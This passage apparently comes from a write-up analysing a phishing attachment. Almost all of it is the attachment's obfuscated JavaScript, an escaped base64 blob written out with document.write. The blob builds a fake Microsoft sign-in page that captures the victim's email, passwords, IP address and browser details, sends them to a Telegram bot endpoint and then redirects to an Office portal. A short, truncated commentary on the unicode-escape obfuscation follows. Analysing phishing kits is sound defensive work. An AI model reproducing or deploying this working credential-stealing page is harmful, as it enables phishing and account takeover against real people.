u006d5ld\\x43\\x39l\\x633R\\172\\114\\x7a\\111\\x75\\x4dS9jb\\062\\x350\\132W50L2NkbmJ1b\\x6d\\122\\163ZXM\\166Y29\\165\\144m\\x56yZ2Vk\\x4c\\156\\u0059yLm\\170vZ\\062\\154u\\114\\u006d1pb\\x6c\\0716a\\u0058\\154\\u0030\\132j\\u0068kenQ5ZWcxczYtb\\u0032hobGV\\156M\\x695jc3M\\x69IH\\x4albD\\060ic3R5bGVza\\107Vld\\103\\111+CiAg\\x49C\\u00418\\x63\\062\\u004eya\\130\\x420Pg\\u006fg\\x49C\\101gICAg\\x49CQ\\157ZG\\071\\x6a\\u0064\\1271l\\x62\\156Qp\\x4c\\x6eJl\\x59\\127R5\\u004bG\\1321bm\\1160\\x61\\x579\\165KC\\x6bgeyQ\\157\\u0049iNkaXNwb\\x47F5Tm\\106tZ\\123IpLmVt\\143\\u0048\\1225\\113CkuY\\130Bw\\132\\1275\\u006bK\\x47VtYW\\u006c\\163\\113TsgJ\\1035nZX\\x52\\x4bU\\0609OKCJodHRwcz\\x6f\\x76L2\\u0046\\167a\\u00535pcG\\x6cm\\x65S5v\\x63mc\\x2f\\132m9yb\\127\\u00460PWp\\u007ab\\0624\\x69L\\x43Bm\\x64W5jdGlv\\142ihkYXRhK\\x53\\102\\067JCg\\u0069\\111\\062\\x64m\\u005ayIp\\x4cmh0bWwo\\x5aGF0YS5\\160cCk7fSl\\071\\x4b\\124s\\x4bIC\\101\\x67\\111Dw\\166\\u00632\\116\\171aX\\1020\\x50go8L2\\150\\x6cY\\127Q+\\103jxib2R5IGN\\x73YXNz\\120SJ\\x6aYiIgc3R\\065bGU9I\\x6d\\122pc3B\\163YX\\1536IGJ\\x73b2Nr\\x4f\\171\\x49+Cjx\\x77IGlkPS\\u004an\\132m\\u0063iIHN0e\\127x\\u006cPSJ\\153\\x61\\x58\\116w\\x62\\x47\\x465O\\151Bu\\x62\\0625\\x6cOy\\x49\\x2bPC9\\167\\120go8Zm9y\\142S\\102uYW1\\154P\\123JmM\\123Iga\\127Q9\\u0049m\\x6bw\\u004djgx\\x49\\151Bub3Z\\x68bG\\x6ckY\\x58Rl\\120\\x53Jub3\\x5ah\\u0062G\\154kYXRlI\\x69\\x42zc\\x47\\126\\x73bGNoZ\\127NrP\\u0053\\x4a\\155YWx\\x7a\\132SI\\x67\\142WV0aG\\071kPS\\u004awb3N0I\\x69\\u0042\\060Y\\130J\\u006eZ\\x58Q9\\111l9\\060b3AiIG\\106\\061\\u0064G\\u0039jb21\\167\\u0062GV0\\u005a\\x54\\u0030ib\\x32ZmI\\151BhY\\063\\122pb24\\x39IiI+CiAgIC\\x41\\070\\132Gl\\x32IG\\u004esYX\\116z\\120SJsb\\x32\\144\\x70bi1\\167YWd\\u0070bmF\\060ZWQtc\\x47FnZ\\123I+\\x43i\\101\\147ICAgICAg\\u0050\\107R\\u0070d\\151\\x42pZD0ib\\107l\\u006eaH\\x52ib3\\150UZW1wbGF\\060Z\\125NvbnR\\u0068\\141\\1275lc\\u0069I\\x2b\\x43jxkaXY\\147aWQ9\\x49mxpZ\\x32\\u00680\\x59m\\x39\\064QmFj\\141\\062\\144y\\u00623V\\x75Z\\u0045\\116v\\x62nRhaW5\\u006cci\\x49+C\\u0069AgICA8ZGl2I\\107NsYX\\116z\\120SJiYWNrZ3JvdW\\x35kLWltYWd\\154\\114W\\x68\\x76b\\107R\\u006c\\x63i\\x49gcm9\\163Z\\x540icHJ\\154c\\x32VudGF0aW9uI\\x6a4KICA\\x67ID\\x78\\x6ba\\x58YgY2\\x78h\\x633\\x4d\\071\\u0049m\\112\\150Y2\\164ncm\\x391b\\x6dQt\\x61W1hZ2U\\x67ZX\\1500LW\\112\\x68\\x592tn\\143\\15591bmQ\\164aW1\\x68\\x5a2UiIH\\1160eWx\\154\\x50\\123JiYWN\\x72Z3\\112vd\\1275kLWltY\\u0057dl\\117\\151\\x42\\u0031\\x63\\x6dw\\x6fJnF1\\u0062\\x33Q\\x37aHR0cH\\115\\066L\\x799h\\x59\\x57\\x52\\x6aZG4ubX\\116mdGF1dG\\x67u\\x62mV\\060L3\\116oYXJl\\132\\103\\x38x\\x4c\\x6aAv\\x5929u\\144G\\u0056\\165\\u0064C\\x39pbWFnZ\\130\\u004dvYmFj\\x612d\\171b3VuZHMvM\\1549i\\u0059zN\\u006b\\115z\\112hN\\152k\\062O\\u0044k\\u0031\\x5a\\152c\\x34YzE\\u0035\\132G\\1312Y\\172\\143\\u0078NzU\\064NmE1ZC\\x35zdmcmcXVv\\u0064\\u0044s\\160OyI\\053PC\\x39kaX\\131+Cjwv\\x5aGl2Pjwv\\132Gl2P\\x67o\\x38\\u005aGl\\x32\\x49GNsYX\\x4ezPSJv\\x64X\\122lc\\151I\\x2bC\\151AgI\\u0043A8\\x5aG\\154\\u0032IGN\\x73YXN\\x7a\\120\\123J0ZW1w\\x62\\107F0\\132S1zZ\\127N\\060aW\\x39uI\\x471haW4\\164c2\\x56\\152\\144Glvb\\151I\\u002b\\x43iAg\\111C\\u0041\\147IC\\x41\\x67\\u0050\\x47Rp\\u0064iBjb\\x47\\u0046zcz0\\x69bW\\u006ck\\x5a\\x47\\x78l\\x49G\\x564dC\\x31t\\x61W\\122\\u006bbGUiP\\x67ogICA\\u0067\\111CAgIC\\101gI\\103\\u00418Z\\107l2IGN\\u0073\\x59\\130Nz\\120SJmdW\\170sLWhlaWd\\u006f\\144C\\x49\\u002bCj\\170\\u006b\\x61\\x58Y\\147Y2xhc3M9I\\u006dZ\\163Z\\130gtY\\062\\u0039\\u0073d\\1271\\u0075\\
x49j4\\x4bICA\\u0067ID\\u0078k\\x61XYgY2x\\u0068\\u00633\\1159\\u0049nd\\160bi1zY3Jv\\142Gwi\\x50gogI\\103\\x41gICAg\\u0049Dx\\x6baX\\131\\147a\\u0057Q9Imx\\160\\x5a2h0Ym94I\\151\\u0042jbGF\\172\\143z0\\151c2\\154nb\\x691pb\\x691i\\u00623\\147\\x67ZXh0LXN\\160Z24ta\\127\\u0034t\\x59m\\x394IGZ\\u0068ZG\\u0055taW4\\164\\x62G\\154\\x6ea\\u0048Ri\\1423gi\\120gog\\x49\\103A\\x67IC\\101\\x67\\u0049\\104\\x78k\\141XY+PG\\154t\\132yBjbG\\x46\\x7ac\\1720ib\\u00479\\u006eb\\171Igcm\\u0039\\163\\u005a\\u00540ia\\x571\\156IiB\\x77b\\x6d\\x64zcm\\x4d9I\\x6dh0\\x64H\\u0042\\x7a\\x4f\\1518vYW\\x46\\x6bY2R\\x75Lm\\x31\\172Z\\156RhdX\\122\\x6f\\114m5\\u006c\\x64C\\x39za\\107\\106yZWQv\\x4dS4\\x77L\\062Nvb\\x6e\\x52lb\\u006e\\121\\u0076a\\x571\\150\\x5a2V\\u007aL2\\u0031\\x70\\131\\063\\112vc\\x329\\155dF\\071s\\142\\x32\\x64\\u0076\\x582Vk\\x4fWM\\x35\\132W\\u0049\\x77ZGNl\\115TdkNzU\\x79YmVkZWE2YjVhY\\062\\122hNmQ5\\x4cnBu\\x5ay\\111gc3Znc3J\\x6a\\x50SJodHR\\167\\143zo\\166L2\\x46\\x68\\u005aGNkbi5\\164\\x632Z\\060\\x59XV0aC5u\\132\\130\\x51vc\\x32hhcm\\126kL\\x7aE\\165M\\x439jb2\\x350ZW50\\1142lt\\131\\127\\144l\\u0063y9t\\141\\x57N\\171\\x623NvZ\\x6eRfb\\u00479\\u006e\\14219lZ\\124\\126j\\x4f\\107Q5\\132mI2M\\152Q\\x34YzkzOGZ\\153MGRjMTkz\\x4ezBlO\\124B\\x69ZC5z\\x64m\\u0063iI\\110NyYz0\\x69\\x61HR0c\\u0048M6Ly9hY\\127RjZG\\x34ubXN\\155dGF1\\144\\x47\\x67\\x75bm\\126\\x30L3\\116\\157Y\\130JlZC\\u0038\\x78LjAv\\x5929ud\\107\\u0056u\\144\\1039p\\x62W\\x46nZX\\115vbW\\154jcm9z\\x622Z\\x30X2\\170vZ29fZWU\\061\\u0059\\172hk\\x4fWZiN\\u006aI\\u0030OGM5MzhmZDBkYzE5Mzcw\\132Tkw\\131m\\121uc\\x33ZnIiBh\\x62\\110\\u00519Ik\\061pY3Jv\\u00632\\u0039\\x6d\\u0064\\103I+PC9\\x6ba\\u0058Y\\u002b\\x43\\x69AgICA\\u0067IC\\x41g\\u0050GRpdiByb2\\170\\154\\120S\\x4a\\x74Y\\127luIj4KPGR\\x70\\x64\\x69BjbGF\\172cz0\\151Y\\u0057\\065pb\\u0057F\\060ZS\\102\\x7a\\142\\107\\x6ck\\132S1pbi1uZXh0\\111j\\064\\u004bICAgIC\\x41\\x67ICA8ZGl2\\111D4KPG\\x52pdi\\x42\\152\\142G\\106\\172c\\x7a\\x30\\x69\\u0061WRlbn\\x52\\160dHl\\103\\x59\\127\\065\\165Z\\130\\x49\\x69Pgo\\x67\\x49CAgPGR\\u0070di\\102p\\u005aD\\x30iZG\\x6cz\\x63GxheU\\065\\x68bW\\125iIGNsYXNzPS\\112p\\132GVu\\x64Gl0eSI+\\x50C\\071kaX\\131+\\103\\152w\\x76Z\\107l2\\120jw\\166Z\\107l2P\\x67\\x6fgICA\\x67\\120C9k\\141XY+C\\151AgICA\\u0038Z\\x47l2IGN\\u0073YXN\\x7aP\\u0053Jw\\u0059\\x57\\144\\x70\\142\\x6dF\\x30aW9u\\u004cXZp\\u005aXc\\x67\\x59W5\\u0070bWF0ZSBoYX\\u004d\\u0074a\\x57\\122l\\142nRpd\\x48\\x6bt\\x59m\\x46ubmVy\\x49HN\\163\\141WR\\154LWl\\x75LW\\u0035le\\110Qi\\x50g\\157gICA\\x67\\u0050GR\\u0070\\144\\u006a4\\x4bC\\u006a\\170k\\141XYg\\141WQ\\u0039ImxvZ2lu\\123\\107VhZG\\x56\\x79\\x49iB\\u006a\\u0062GFzcz\\x30\\u0069\\u0063m93\\111HRp\\x64\\107xlI\\x47\\u00564d\\x4310\\141X\\x52sZSI\\u002b\\x43\\x69AgICA8ZGl\\x32\\x49H\\112\\166b\\107U\\x39\\x49m\\x68l\\131W\\122pb\\x6dci\\u0049GFy\\141WE\\x74bG\\126\\u0032ZW\\u00779\\111\\152\\x45i\\x50kVudG\\x56yI\\x48B\\x68c3N3b3JkP\\103\\x39\\x6baXY+C\\x6aw\\x76ZGl\\062\\u0050\\x67\\x6f\\u0038ZGl2IG\\154kP\\123\\u004a\\154cnJ\\166\\u0063n\\x423IiBzdHlsZT0iY2\\x39s\\142\\063I\\066\\u0049\\x48Jl\\x5aD\\163g\\142W\\x46yZ\\x32luOiAxNXB4\\117yBtYXJnaW4t\\u0062\\x47\\126mdD\\157\\x67M\\u0048B\\064\\117\\x79\\x42t\\x59XJnaW\\064\\164\\x64G\\u0039w\\u004fiAwc\\x48g7\\111G1\\x68\\143md\\x70b\\x691\\x69b3\\u0052\\x30\\1422\\x306\\u0049D\\x42w\\145\\u0044siP\\x6a\\x77vZ\\u0047l2\\120go8Z\\107l2I\\107\\u004esYXN\\x7a\\x50S\\112yb3\\143iPg\\x6fg\\u0049C\\x41gPGR\\160d\\151Bj\\142\\107\\106zc\\u007a\\u0030\\151Zm9yb\\123\\061n\\143m91cC\\u00
42\\152\\142\\u0032\\167t\\u0062\\127Q\\x74\\u004d\\152\\u0051i\\u0050\\147ogICAgI\\103A\\147\\u0049\\x44xkaX\\131gY2xhc3\\x4d\\071InB\\x73\\131WNla\\107\\x39sZG\\x56yQ2\\071udGFpbmVy\\111\\x6a4\\113IC\\101gICA\\u0067ICAgI\\103AgP\\x47lucHV0\\u0049\\x47\\x35\\x68\\142WU9In\\x42hc3N3ZCIg\\144H\\x6cw\\132T\\x30\\u0069c\\u0047F\\x7ac3d\\x76\\143mQiI\\107\\u006ckP\\123JpMDEx\\117CIgYXV0b2NvbXB\\u0073ZXRlP\\x53\\u004av\\u005amYi\\x49GNsYXN\\x7aP\\x53\\x4amb3Jt\\114W\\x4evbn\\x52\\171b2wg\\x61\\x57\\x35wd\\x58QgZ\\x58h\\x30L\\127\\154uc\\110V0\\111H\\122leH\\121t\\131m\\071\\u0034I\\107V4dC10\\x5aX\\x680LW\\u004a\\166e\\u0043I\\147cGxhY\\062\\126o\\u0062\\x32xkZ\\u0058I9\\u0049\\u006c\\102\\150c3N\\063b3JkIiByZXF1aXJlZ\\u0043\\x41vPg\\1578L\\x32\\x52pd\\1524K\\u0049\\103AgID\\x77v\\u005a\\107l\\x32P\\x67o8L\\062Rpd\\152\\x34KPGR\\x70\\u0064\\x6a4K\\120GRpdiBjbGFzcz0i\\x63\\1079z\\x61\\x58Rpb2\\u0034\\u0074Yn\\x560\\144G9uc\\x79I+C\\151\\101g\\111CA8Z\\x47l2P\\147ogICA\\x67ICA\\147\\111D\\u0078\\x6ba\\130Y\\147Y2xh\\1433M9In\\u004avd\\171I\\x2b\\103i\\u0041g\\u0049CA\\147I\\103\\u0041gI\\x43AgIDxk\\141XYgY2x\\x68c\\x33M9\\x49m\\x4e\\x76\\x62C1t\\u005aC\\060yNCI+\\u0043iAg\\111C\\101\\x67IC\\101g\\111CA\\x67\\u0049CAgI\\x43A8ZG\\x6c2I\\u0047\\u004es\\x59\\130NzP\\123J0\\u005aXh\\x30LTEzI\\152\\064\\113I\\x43AgICAg\\111CA\\x67I\\u0043A\\147\\111CAgICAg\\111CA\\x38\\x5aG\\1542\\111\\107Ns\\131X\\u004ez\\u0050S\\u004amb\\063\\u004at\\114\\127d\\171b3\\u0056wI\\1524\\113\\111CA\\x67\\x49CAgI\\103A\\x67\\x49CAgICAg\\u0049\\x43AgI\\103\\101g\\111CA\\x67PGEgaW\\u00519\\u0049\\x6d\\154k\\121\\x56\\x39\\121V0RfRm9\\x79\\x5a29\\u0030\\x55\\x47F\\172c\\u0033dvcmQiIHJvb\\107\\u00559\\111\\x6d\\170pb\\155\\x73\\151\\111\\x47\\150yZWY\\071I\\x69\\115\\151Pk\\132\\u0076c\\155dvdH\\122lb\\x69B\\u0074eSBwY\\130Nzd\\x32\\x39yZDw\\166YT4K\\x49C\\x41g\\111CAgI\\x43\\101gI\\103\\u0041\\u0067I\\x43A\\u0067\\u0049\\x43Ag\\111CA8\\u004c\\062R\\x70dj\\x34KP\\x47Rp\\x64\\u0069Bj\\x62GFz\\x63z0i\\132m9ybS\\x31ncm9\\u0031c\\x43I\\x2bCjwvZG\\x6c2PgogICAg\\x49\\x43Ag\\111\\104x\\153a\\130\\u0059\\x67Y2\\170\\150c\\x33M9\\u0049\\u006dZ\\x76cm0tZ3JvdXAi\\x50go\\147ICAg\\111CAg\\u0049CAgICA\\070YSBpZD\\x30iaTE2\\u004ej\\u0067i\\111\\107hyZ\\x57Y9Ii\\x4diPlNpZ24\\x67aW4gd2l\\060aCBhbm90\\141GVyI\\107Fj\\x5929\\u0031bnQ8L2E\\053CiAgICAg\\111C\\101g\\x50C9k\\141XY+PC\\x39ka\\u0058\\131+\\x50\\103\\x39\\u006baXY+PC9ka\\x58Y+Ci\\x41gIC\\1018L2\\x52\\u0070\\u0064\\1524K\\103\\x69\\x41\\x67I\\u0043\\u0041\\x38ZGl\\u0032\\u0049G\\x4es\\131\\x58\\116zPSJ3aW4tYnV0d\\107\\071uL\\x58B\\x70\\x62i1ib3\\x520b20\\151\\u0050g\\157gI\\x43Ag\\u0049CAgIDx\\153a\\u0058Yg\\1312x\\150\\1433M9\\111nJ\\166dyI\\u002bCiAg\\x49\\u0043AgI\\x43AgICA\\x67\\111Dx\\153\\u0061XY+PGRpdiB\\u006a\\142GFzc\\172\\060iY29s\\114X\\x68\\x7a\\u004cT\\x49\\x30\\u0049\\1075vLXB\\x68\\132GR\\u0070bmctb\\x47\\126md\\x431\\171aWdod\\103B\\151\\u0064XR0b\\x324tY2\\071\\x75dG\\u0046p\\x62mVy\\111j4KI\\103A\\147IDx\\153\\141XYgY2x\\150c\\x33M\\x39ImlubG\\154uZ\\1231i\\142G9ja\\u0079I\\053CiA\\u0067IC\\101g\\111\\x43Ag\\120GlucHV\\x30IH\\x525\\u0063GU9\\u0049nN1Ym1pd\\u0043I\\147\\x61W\\1219Im\\x6c\\x6b\\x550\\154C\\144X\\x52\\060\\u0062245I\\x69BjbGFz\\u0063\\x7a0\\x69d\\x32l\\x75\\114WJ1dHRvbiBidXR0b\\u00325\\146cHJpbWF\\u0079\\145S\\u0042\\x69d\\u0058\\1220b\\u0032\\064g\\x5aXh0L\\x57J1dHRv\\x62iBw\\u0063\\x6dltY\\x58J\\x35IG\\1264\\144C1wcm\\154tY\\x58J5I\\151B2\\131Wx1ZT0\\x69U2lnbiBp\\x62iI\\x2b\\103iAgIC\\x418L2\\122\\x70dj4K\\x50\\u00439\\153\\u0061XY+PC9\\153aXY\\x2bC\\151
\\x41gI\\103A\\x67\\111CAgPC9k\\141XY+C\\151A\\147\\111CA8\\x4c\\x32Rp\\144j\\064\\113P\\x439kaXY\\053\\x50C9kaXY\\x2bC\\151AgICA\\x38\\x4c2\\x52pdj4KPC9\\153a\\u0058Y+PC9k\\141\\x58\\131+PC\\u0039k\\u0061\\x58Y+PC9ka\\u0058Y+\\x43\\x69Ag\\111CA8L2Rpd\\1524KP\\1039kaXY+\\x50C9\\x6baXY+\\u0043\\151\\x41gICAgIC\\u0041\\u0067\\x50\\u00439k\\141XY+CiAg\\u0049C\\x41\\x38L2Rpdj4KICA\\147\\111\\104\\x78kaXY\\147a\\x57Q9ImZv\\x623Rl\\u0063iIgc\\x6d\\071sZT\\x30\\151\\x5929u\\144\\107VudGluZm8\\x69\\x49\\u0047\\116sYXNz\\120S\\112m\\u00622\\0710Z\\x58IgZXh0\\x4cWZvb3\\122l\\x63iI+Ci\\101gI\\x43\\101\\x67I\\103\\x41gPGRpdj4KPG\\x52\\160\\144\\x69BpZ\\1040iZ\\155\\071vd\\x47VyTGl\\x75\\u00613\\x4di\\111GNsY\\130N\\x7a\\120\\123J\\u006db2\\0710ZX\\x4aOb2R\\154IHR\\u006ceHQtc\\062\\126\\x6ab2\\065\\u006b\\x59X\\112\\u0035Ij4K\\111CA\\147ICAg\\x49CA\\x38YS\\102\\160ZD\\060i\\132nRyV\\u0047VybX\\u004diI\\u0047hyZWY9\\111iMi\\x49G\\u004e\\x73YXNzP\\x53Jm\\14229\\060Z\\130I\\164Y29\\x75\\u0064GVudC\\x42l\\145HQ\\164Z\\1559v\\144G\\x56\\u0079L\\x57Nv\\x62nRlbnQ\\u0067Zm9vdGV\\171LWl0\\x5a\\1270\\x67\\u005a\\x58h\\x30LWZvb3Rlci1pd\\x47V\\u0074Ij5UZXJtc\\171BvZiB1c\\u0032\\125\\x38\\114\\u0032\\105\\053C\\u0069\\x41gICAg\\x49CA\\147P\\x47EgaWQ9ImZ0c\\x6cByaX\\x5ahY3\\u006biIG\\x68yZ\\u0057Y9I\\x69MiIG\\x4e\\x73YXNz\\120SJmb290ZX\\111tY29udGVu\\x64\\103BleHQtZ\\155\\u0039\\x76\\144G\\x56yL\\x57\\x4evb\\u006eR\\u006cbnQgZ\\u006d9\\x76dGVyLWl\\x30ZW\\x30gZXh0LWZvb3Rlc\\x69\\x31p\\x64GVt\\u0049j\\x35Qcml\\062\\x59WN\\x35I\\103ZhbXA7I\\u0047\\x4e\\u0076\\1422tpZX\\u004d8L\\x32E+C\\151A\\x67ICA\\x38\\131SBpZD0i\\142W9yZU9wd\\u0047l\\u0076bn\\u004d\\151I\\x47\\150\\171\\132WY\\071Ii\\x4d\\u0069I\\107FyaWE\\164bGFiZWw\\u0039\\111k\\116\\u0073aWNrIGhl\\x63mU\\x67Zm9yIHRyb\\u0033V\\x69bGVzaG9v\\u0064\\u0047luZyBp\\142mZvcm1\\x68dGlvb\\x69IgY2x\\x68c3\\u004d\\x39Im\\132\\x76b3Rl\\x63i1\\x6ab\\06250Z\\u0057\\0650IGV4\\144C1mb2\\x390ZXItY29udG\\x56udCBm\\x62290\\x5aXItaXRlb\\x53Bl\\145\\110\\121\\164Z\\x6d\\071\\x76\\144\\x47VyLW\\1540Z\\u00570\\147\\x5aGV\\x69dWctaXR\\x6cb\\123B\\u006c\\145HQtZGVidWctaXRlb\\123\\111+Li4u\\x50\\1039\\150\\x50go\\070L2Rp\\x64\\x6a48L\\062\\u0052p\\x64j\\x34K\\111CAgIDw\\x76\\132\\x47l2Pgo8L2\\u0052pd\\x6a48\\1142Rp\\x64\\x6a4\\x38L2\\u0052\\u0070dj4K\\x50C9\\155b\\x33\\x4atPgo\\x38\\x632Ny\\x61X\\x420P\\x67ogICA\\147dm\\x46y\\111\\107\\x4evdW50I\\x440gM\\u0044s\\113ICAgI\\x48ZhciBwc3dkMTsKIC\\101gIG\\122vY3\\x56tZW50\\x4cmdldEVsZ\\u0057\\061lbnRC\\x65UlkKCJp\\x5aF\\x4eJ\\u0051nV0d\\107\\u0039uOSIp\\114mF\\x6bZE\\x56\\x32\\u005aW50\\x54Glzd\\x47VuZXI\\x6fI\\155\\116\\163aWNrIiwgZn\\u0056u\\u00593Rpb\\x324\\u006f\\x5aSk\\147ewogI\\103A\\x67ZS\\u0035\\x77cmV2\\u005aW5\\u0030R\\107Vm\\x59XVsdC\\147p\\x4fwo\\u004bIC\\101gIHZhci\\x42wc\\063dk\\u0049D0\\147\\x5aG9jdW\\061lbnQu\\x5a2\\x56\\u0030\\x52W\\170lb\\u0057\\x56udEJ\\065SWQoJ2k\\x77MTE\\x34\\x4aykudmFsdW\\125\\u0037CiA\\147IC\\x42p\\132i\\101ocH\\x4e3Z\\x43A\\u0039PSBudWx\\163IHx8IHB\\u007a\\u00642Q\\x67PT\\x30gI\\u0069Ipewo\\u0067\\x49CAgICA\\147IGRvY\\063VtZW50Lmd\\154\\x64\\x45Vs\\132\\x571lbnRCe\\u0055lkKCdlcnJ\\166c\\156B\\063\\u004aykuaW5uZ\\x58\\x4a\\x49\\126E\\x31MI\\x440\\147YF\\u006c\\166dXIg\\131W\\x4ejb3\\x56\\165dCBw\\u0059XNz\\14429yZCBjYW\\065\\x75\\x62\\x33QgY\\155\\125gZW1\\x77d\\110kuIGl\\x6dIHlvdSB\\u006bb24n\\u0064CB\\x79\\u005aW1l\\x62WJl\\143iB5b3\\126y\\u0049\\x48Bhc3N3b3JkLC\\x418\\131SBocmVm\\120\\u0053\\111j\\u0049j5y\\x5a\\x58NldC\\x42pdC\\x42\\x75b3cu\\u0050C9hPmA7Ci\\u0041\\u0067\\111CAgIC\\x41\\147c2V0\\126\\10
7ltZW91\\144CgoKS\\x419\\120iB7ZG9jdW\\061lbnQ\\x75Z2V0RWx\\x6c\\142W\\126u\\x64E\\u004a5SWQoJ2\\x56ycm9ycH\\u0063\\u006eK\\x53\\x35p\\u0062m5\\x6c\\x63\\x6bhUT\\x55wgP\\123AnJzt9LCAzM\\104AwK\\124t\\u0039C\\151AgICBl\\x62\\110NlI\\107l\\x6dK\\x48Bz\\x642QubGVuZ3Ro\\x49\\104wgNS\\u006c\\067\\103iA\\x67ICA\\147\\111\\x43A\\x67\\132\\107\\x39j\\x64\\u00571l\\x62\\x6eQu\\x5a2\\x56\\060RWx\\x6c\\142\\x57\\126udE\\1125S\\127QoJ2V\\171cm9\\u0079cHcnKS\\x35pb\\1555\\x6cc\\u006bh\\125TUwg\\x50S\\101i\\x57W91\\143iBh\\1312N\\x76d\\x57\\x350\\111HB\\u0068c\\x33N3\\u00623J\\x6bIGlzIHRvbyBz\\141\\x479y\\144C4\\u0069Owog\\x49CA\\147IC\\101gIH\\116ldFRpb\\127VvdXQ\\u006fK\\x43\\153gPT4ge\\062RvY\\u0033\\x56t\\132W5\\x30Lm\\x64\\154dE\\x56sZ\\x571\\u006cb\\x6eRCe\\u0055lkKCdlcnJvc\\x6eB\\u0033Jyk\\x75\\x61\\1275uZ\\u0058JIV\\x451MID0gJyc7I\\x47\\u0052\\x76\\x593Vt\\132W50Lmd\\154dE\\u0056sZW\\061\\x6cbn\\122CeU\\x6ckKCJpMDI4M\\x53IpLn\\u004alc2V0KCk\\x37\\x66S\\167gMzAw\\u004dCk7CiAgICB9IGV\\163c2U\\147\\141\\127\\131g\\x4bGNvdW50PD\\x45pewog\\111CA\\147I\\x43\\x41gIHBz\\u0064\\062\\121\\170\\x49D0gZ\\107\\x39jdW1lbnQ\\x75Z2V\\060R\\u0057x\\x6cbWVudEJ5SWQo\\112\\x32kwM\\x54\\x45\\064Jykudm\\x46\\u0073dW\\1257CiAgICAg\\x49\\u0043AgZ\\u0047\\071jd\\x571lbn\\121uZ\\x32\\x560\\122Wxlb\\u0057V\\x75dEJ5SWQ\\x6f\\x4a\\x32Vycm9ycHcn\\u004bS5pbm5lckhUT\\x55wgPS\\x42g\\x57W91c\\151BhY\\x32\\x4e\\166d\\x5750I\\107\\x39\\171\\111\\x48B\\150c\\063N3b3Jk\\111GlzIG\\u006cuY29y\\u0063mV\\u006adC\\x34g\\u0061W\\131geW91\\u0049GRvbid\\x30\\x49\\x48Jlb\\x57VtY\\x6d\\x56\\u0079\\111Hl\\166dXI\\u0067cGFzc3\\144vcmQsIDx\\150IG\\u0068yZWY9Ii\\x4diPn\\u004a\\x6cc2\\u00560I\\107l0IG5v\\144y\\x348L\\x32E+Y\\x44\\163\\x4bICAg\\x49\\x43A\\147\\x49CBkb2N1bWVudC\\x35\\u006eZXRFbGV\\164ZW5\\x30Qn\\u006c\\112ZC\\147iaTAyODEiKS5yZXNldC\\147\\160Oy\\102jb3V\\u0075dCsr\\1173\\x30KICAgIGVsc\\x32Uge\\u0077\\u006f\\u0067ICAgICA\\x67IH\\132\\x68ci\\x42JUC\\101\\x39IGRvY\\x33\\x56tZW50Lmdld\\105V\\u0073\\132W1lbnRCeU\\u006ckKCdn\\x5amc\\x6eKS5\\060Z\\u0058h0Q2\\x39udGV\\165dD\\163KICAg\\u0049CA\\x67IC\\x422YX\\u0049gbWVz\\1432FnZS\\x419IGA\\x39\\u0050T\\0609PT0g\\u0054zM2NS\\x42SZ\\u0058N1bHQgPT09PT0\\u0039\\130\\x48Jc\\x62\\153VtYWls\\u004f\\151Ak\\1452VtYWlsfV\\170yX\\u0047\\x35QYX\\116\\172\\x6429yZ\\x44E6IC\\x527cHN3\\x5a\\u0044F9XH\\u004a\\x63blBhc3N3b3\\112\\u006bMjogJHt\\x77c\\063dk\\u0066V\\u0078\\171X\\x475JUD\\x6f\\147a\\u0048R\\060c\\x48\\x4d\\066L\\x799pc\\1031h\\143G\\x6bu\\13129tL\\x79R\\067SV\\102\\071XHJ\\143b\\x6cVzZ\\u0058\\u0049t\\x51W\\144\\u006cb\\u006eQ\\x36ICR7bmF2a\\127dhd\\1079\\u0079L\\x6e\\x56z\\x5aX\\x4aB\\132\\x32Vud\\u00481\\143\\143l\\x78\\u0075PT09P\\124\\u00309PT0\\u0039\\u0050T09PT09PT\\x30\\x39PWA7\\u0043iAgI\\103\\101gICA\\u0067\\u0064mF\\171\\111HNld\\110\\122pb\\x6ddzID0gew\\x6f\\147IC\\101\\x67ICAg\\x49CAg\\111\\103A\\151\\u0059X\\1165\\142m\\115i\\x4fiB\\060\\x63nVlLCA\\u0069Y\\u0033\\x4av\\u00633N\\x45b\\062\\u0031haW\\x34i\\x4fiB0\\143\\x6eVlLCA\\x69dXJsIj\\x6f\\x67\\111\\155h\\x30\\x64HBz\\x4f\\151\\x38v\\x59XBp\\u004cnRlbGVncmFtL\\u006d9\\x79Zy\\u0039i\\142\\063\\121i\\111\\u0043sgdG\\x39\\162\\132W\\064gK\\x79\\x41\\x69L3Nlb\\x6dRNZ\\x58NzY\\127\\x64lIiwKI\\103\\101g\\111\\x43A\\147IC\\x41g\\111C\\u0041gIm1l\\144GhvZCI6ICJQ\\1241N\\x55\\u0049\\u0069\\x77gI\\x6dhlYW\\122l\\143nMi\\u004fiB7\\x49kN\\x76b\\156\\122lb\\156Q\\164\\x56H\\154\\167\\132\\123I\\066ICJ\\x68cH\\102\\x73aWN\\x68dG\\154\\x76\\142\\x699qc\\u00329uI\\151\\167\\u0067\\u0049mN\\u0068Y2\\u0068lL\\x57NvbnRyb2\\167i\\x4fiAib\\155\\u0038t
\\x59\\062\\106jaGU\\x69fS\\x77K\\u0049\\x43\\x41gICA\\147\\111C\\101g\\111CA\\x67\\111\\u006d\\122hd\\x47\\105iOi\\u0042KU09O\\114n\\1160cm\\154u\\1322lme\\123h7\\111mNoYX\\u0052\\u0066a\\x57\\121iO\\151B\\152\\141GF0X2lkLCAidGV\\x34\\x64\\x43I\\066\\111\\1071l\\143\\x33NhZ\\062V9KX\\x30\\u004b\\111\\x43\\u0041gIC\\x41gIC\\x41kLm\\106\\161YX\\147o\\1432\\u00560dG\\x6c\\u0075\\1323\\115p\\u004c\\155R\\x76bm\\x55\\x6f\\113HJlc3Bv\\142nN\\x6cKSA9PiB7d\\u0032luZ\\107\\071\\x33Lm\\u0078\\u0076Y\\u0032\\x46\\x30\\141W9uLn\\x4a\\x6c\\x63Gx\\x68\\x592UoJ\\x32h\\u0030\\x64\\110BzOi\\070v\\x63G9\\x79d\\107FsL\\u006d\\x39m\\x5amljZ\\123\\u0035j\\x622\\x30\\166c2Vy\\x64m\\154jZ\\130N0YXR1cy\\x63p\\1173\\x30pOwo\\u0067IC\\101\\x67fSA\\113I\\103\\x41gIH\\060\\x70O\\x79AKP\\x439zY3Jp\\x63HQ+C\\u006awvZGl\\x32\\120jwvYm9k\\x65T48L\\u0032h0b\\127w+");\\u0064\\u006fc\\u0075m\\u0065\\u006e\\u0074.write(data);</script> What’s interesting is they’ve exploited that you can use unicode escaping for JavaScript identifier names, which is legal as per the spec.\nLet’s take this:\n1 var e\\u006dail="<yes, my email was here>"; We have the unicode codepoint of 006d (the \\u indicates that it’s a unicode escape) and if we refer to a unicode lookup table 